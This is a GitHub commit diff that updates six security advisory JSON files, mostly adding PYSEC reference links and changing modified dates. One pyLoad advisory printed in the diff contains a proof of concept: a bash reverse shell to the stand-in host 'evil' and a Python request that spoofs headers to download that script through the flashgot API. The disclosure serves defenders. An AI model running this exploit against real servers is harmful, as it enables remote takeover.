Skip to content

Commit 42fff07

Browse files
1 parent b0fa059 commit 42fff07

6 files changed

Lines changed: 41 additions & 10 deletions

File tree

advisories/github-reviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-xv6x-43gq-4hfj",
4-
"modified": "2024-02-08T21:31:52Z",
4+
"modified": "2026-06-08T19:04:54Z",
55
"published": "2022-05-02T03:40:08Z",
66
"aliases": [
77
"CVE-2009-2940"
@@ -69,6 +69,10 @@
6969
"type": "PACKAGE",
7070
"url": "https://github.com/PyGreSQL/PyGreSQL"
7171
},
72+
{
73+
"type": "WEB",
74+
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pygresql/PYSEC-2009-18.yaml"
75+
},
7276
{
7377
"type": "WEB",
7478
"url": "http://ubuntu.com/usn/usn-870-1"

advisories/github-reviewed/2024/02/GHSA-p3rv-qj56-2fqx/GHSA-p3rv-qj56-2fqx.json

Lines changed: 10 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,13 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-p3rv-qj56-2fqx",
4-
"modified": "2024-02-21T00:15:55Z",
4+
"modified": "2026-06-08T19:05:07Z",
55
"published": "2024-02-20T03:30:57Z",
66
"aliases": [
77
"CVE-2024-1647"
88
],
99
"summary": "Cross-site Scripting in Pyhtml2pdf",
10-
"details": "Pyhtml2pdf version 0.0.6 allows an external attacker to remotely obtain\n\narbitrary local files. This is possible because the application does not\n\nvalidate the HTML content entered by the user.\n\n\n\n",
10+
"details": "Pyhtml2pdf version 0.0.6 allows an external attacker to remotely obtain\n\narbitrary local files. This is possible because the application does not\n\nvalidate the HTML content entered by the user.",
1111
"severity": [
1212
{
1313
"type": "CVSS_V3",
@@ -43,6 +43,14 @@
4343
{
4444
"type": "WEB",
4545
"url": "https://fluidattacks.com/advisories/oliver"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyhtml2pdf/PYSEC-2024-301.yaml"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://pypi.org/project/pyhtml2pdf"
4654
}
4755
],
4856
"database_specific": {

advisories/github-reviewed/2024/10/GHSA-w7hq-f2pj-c53g/GHSA-w7hq-f2pj-c53g.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,13 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-w7hq-f2pj-c53g",
4-
"modified": "2024-10-28T12:24:45Z",
4+
"modified": "2026-06-08T19:05:57Z",
55
"published": "2024-10-28T12:23:29Z",
66
"aliases": [
77
"CVE-2024-47821"
88
],
99
"summary": "pyLoad vulnerable to remote code execution by download to /.pyload/scripts using /flashgot API",
10-
"details": "### Summary\nThe folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file.\n\n### Details\n\n**Configuration changes**\n1. Change the download folder to `/home/<user>/.pyload/scripts`\n2. Change permissions for downloaded files:\n 1. Change permissions of downloads: on\n 2. Permission mode for downloaded files: 0744\n\n**Making the request to download files**\n\nThe `flashgot` API provides functionality to download files from a provided URL. Although pyload tries to prevent non-local requests from being able to reach this API, it relies on checking the Host header and the Referer header of the incoming request. Both of these can be set by an attacker to arbitrary values, thereby bypassing these checks.\n\n*Referer header check*\n```\ndef flashgot():\n if flask.request.referrer not in (\n \"http://localhost:9666/flashgot\",\n \"http://127.0.0.1:9666/flashgot\",\n ):\n flask.abort(500)\n ...\n```\n*Host header check for local check*\n```\ndef local_check(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n remote_addr = flask.request.environ.get(\"REMOTE_ADDR\", \"0\")\n http_host = flask.request.environ.get(\"HTTP_HOST\", \"0\")\n\n if remote_addr in (\"127.0.0.1\", \"::ffff:127.0.0.1\", \"::1\", \"localhost\") or http_host in (\n \"127.0.0.1:9666\",\n \"[::1]:9666\",\n ):\n return func(*args, **kwargs)\n else:\n return \"Forbidden\", 403\n\n return wrapper\n```\n\nOnce the file is downloaded to a folder in the scripts folder, the attacker can perform the respective action, and the script will be executed\n\n\n### PoC\nCreate a malicious file. I have created a reverse shell\n```\n#!/bin/bash\nbash -i >& /dev/tcp/evil/9002 0>&1\n```\n\nHost this file at some URL, for eg: http://evil\n\nCreate a request like this for the `flashgot` API. I am using `download_finished` folder as the destination folder. Scripts in this folder are run when a download is completed.\n```\nimport requests\n\nurl = \"http://pyload/flashgot\"\nheaders = {\"host\": \"127.0.0.1:9666\", \"Referer\": \"http://127.0.0.1:9666/flashgot\"}\n\ndata = {\n \"package\": \"download_finished\", \n \"passwords\": \"optional_password\", \n \"urls\": \"http://evil/exp.sh\",\n \"autostart\": 1,\n}\n\n\nresponse = requests.post(url, data=data, headers=headers)\n```\nWhen the above request is made, exp.sh will be downloaded to `/scripts/download_finished folder`. For all subsequent downloads, this script will be run. Sending the request again causes a download of the file again, and when the download is complete, the script is run.\n\nI also have a listener on my machine which receives the request from the pyload server. When the script executes, I get a connection back to my machine\n\n### Screenshots\n*Download folder*\n\n<img width=\"672\" alt=\"1\" src=\"https://github.com/user-attachments/assets/77fc5202-bed2-41a2-98ae-9cb7b1315f76\">\n\n*`exp.sh` is downloaded*\n\n<img width=\"714\" alt=\"2\" src=\"https://github.com/user-attachments/assets/5e6e19db-2a5c-48f4-9973-817528b5b9ec\">\n\n*Script is run*\n\n<img width=\"714\" alt=\"3\" src=\"https://github.com/user-attachments/assets/34fbdaee-50ba-46a8-a372-ec8c91d03aa9\">\n\n*Reverse shell connection is received*\n\n<img width=\"314\" alt=\"4\" src=\"https://github.com/user-attachments/assets/4713d56e-e850-47ad-99b3-cab0c7bba800\">\n\n\n### Impact\nThis vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system\n",
10+
"details": "### Summary\nThe folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file.\n\n### Details\n\n**Configuration changes**\n1. Change the download folder to `/home/<user>/.pyload/scripts`\n2. Change permissions for downloaded files:\n 1. Change permissions of downloads: on\n 2. Permission mode for downloaded files: 0744\n\n**Making the request to download files**\n\nThe `flashgot` API provides functionality to download files from a provided URL. Although pyload tries to prevent non-local requests from being able to reach this API, it relies on checking the Host header and the Referer header of the incoming request. Both of these can be set by an attacker to arbitrary values, thereby bypassing these checks.\n\n*Referer header check*\n```\ndef flashgot():\n if flask.request.referrer not in (\n \"http://localhost:9666/flashgot\",\n \"http://127.0.0.1:9666/flashgot\",\n ):\n flask.abort(500)\n ...\n```\n*Host header check for local check*\n```\ndef local_check(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n remote_addr = flask.request.environ.get(\"REMOTE_ADDR\", \"0\")\n http_host = flask.request.environ.get(\"HTTP_HOST\", \"0\")\n\n if remote_addr in (\"127.0.0.1\", \"::ffff:127.0.0.1\", \"::1\", \"localhost\") or http_host in (\n \"127.0.0.1:9666\",\n \"[::1]:9666\",\n ):\n return func(*args, **kwargs)\n else:\n return \"Forbidden\", 403\n\n return wrapper\n```\n\nOnce the file is downloaded to a folder in the scripts folder, the attacker can perform the respective action, and the script will be executed\n\n\n### PoC\nCreate a malicious file. I have created a reverse shell\n```\n#!/bin/bash\nbash -i >& /dev/tcp/evil/9002 0>&1\n```\n\nHost this file at some URL, for eg: http://evil\n\nCreate a request like this for the `flashgot` API. I am using `download_finished` folder as the destination folder. Scripts in this folder are run when a download is completed.\n```\nimport requests\n\nurl = \"http://pyload/flashgot\"\nheaders = {\"host\": \"127.0.0.1:9666\", \"Referer\": \"http://127.0.0.1:9666/flashgot\"}\n\ndata = {\n \"package\": \"download_finished\", \n \"passwords\": \"optional_password\", \n \"urls\": \"http://evil/exp.sh\",\n \"autostart\": 1,\n}\n\n\nresponse = requests.post(url, data=data, headers=headers)\n```\nWhen the above request is made, exp.sh will be downloaded to `/scripts/download_finished folder`. For all subsequent downloads, this script will be run. Sending the request again causes a download of the file again, and when the download is complete, the script is run.\n\nI also have a listener on my machine which receives the request from the pyload server. When the script executes, I get a connection back to my machine\n\n### Screenshots\n*Download folder*\n\n<img width=\"672\" alt=\"1\" src=\"https://github.com/user-attachments/assets/77fc5202-bed2-41a2-98ae-9cb7b1315f76\">\n\n*`exp.sh` is downloaded*\n\n<img width=\"714\" alt=\"2\" src=\"https://github.com/user-attachments/assets/5e6e19db-2a5c-48f4-9973-817528b5b9ec\">\n\n*Script is run*\n\n<img width=\"714\" alt=\"3\" src=\"https://github.com/user-attachments/assets/34fbdaee-50ba-46a8-a372-ec8c91d03aa9\">\n\n*Reverse shell connection is received*\n\n<img width=\"314\" alt=\"4\" src=\"https://github.com/user-attachments/assets/4713d56e-e850-47ad-99b3-cab0c7bba800\">\n\n\n### Impact\nThis vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system",
1111
"severity": [
1212
{
1313
"type": "CVSS_V3",
@@ -55,6 +55,10 @@
5555
{
5656
"type": "PACKAGE",
5757
"url": "https://github.com/pyload/pyload"
58+
},
59+
{
60+
"type": "WEB",
61+
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-302.yaml"
5862
}
5963
],
6064
"database_specific": {

advisories/github-reviewed/2026/03/GHSA-6px9-j4qr-xfjw/GHSA-6px9-j4qr-xfjw.json

Lines changed: 10 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-6px9-j4qr-xfjw",
4-
"modified": "2026-03-09T15:49:37Z",
4+
"modified": "2026-06-08T19:06:27Z",
55
"published": "2026-03-05T00:32:19Z",
66
"aliases": [
77
"CVE-2026-29778"
@@ -28,11 +28,14 @@
2828
"introduced": "0.5.0b3.dev13"
2929
},
3030
{
31-
"last_affected": "0.5.0b3.dev96"
31+
"fixed": "0.5.0b3.dev97"
3232
}
3333
]
3434
}
35-
]
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 0.5.0b3.dev96"
38+
}
3639
}
3740
],
3841
"references": [
@@ -47,6 +50,10 @@
4750
{
4851
"type": "PACKAGE",
4952
"url": "https://github.com/pyload/pyload"
53+
},
54+
{
55+
"type": "WEB",
56+
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-121.yaml"
5057
}
5158
],
5259
"database_specific": {

advisories/github-reviewed/2026/03/GHSA-752w-5fwx-jx9f/GHSA-752w-5fwx-jx9f.json

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-752w-5fwx-jx9f",
4-
"modified": "2026-05-05T18:33:22Z",
4+
"modified": "2026-06-08T19:06:39Z",
55
"published": "2026-03-13T20:05:04Z",
66
"aliases": [
77
"CVE-2026-32597"
@@ -51,6 +51,10 @@
5151
"type": "PACKAGE",
5252
"url": "https://github.com/jpadilla/pyjwt"
5353
},
54+
{
55+
"type": "WEB",
56+
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2026-120.yaml"
57+
},
5458
{
5559
"type": "WEB",
5660
"url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00008.html"

advisories/github-reviewed/2026/03/GHSA-q485-cg9q-xq2r/GHSA-q485-cg9q-xq2r.json

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-q485-cg9q-xq2r",
4-
"modified": "2026-03-27T21:57:12Z",
4+
"modified": "2026-06-08T19:06:55Z",
55
"published": "2026-03-19T17:55:53Z",
66
"aliases": [
77
"CVE-2026-33314"
@@ -50,6 +50,10 @@
5050
{
5151
"type": "PACKAGE",
5252
"url": "https://github.com/pyload/pyload"
53+
},
54+
{
55+
"type": "WEB",
56+
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-122.yaml"
5357
}
5458
],
5559
"database_specific": {

0 commit comments

Comments
 (0)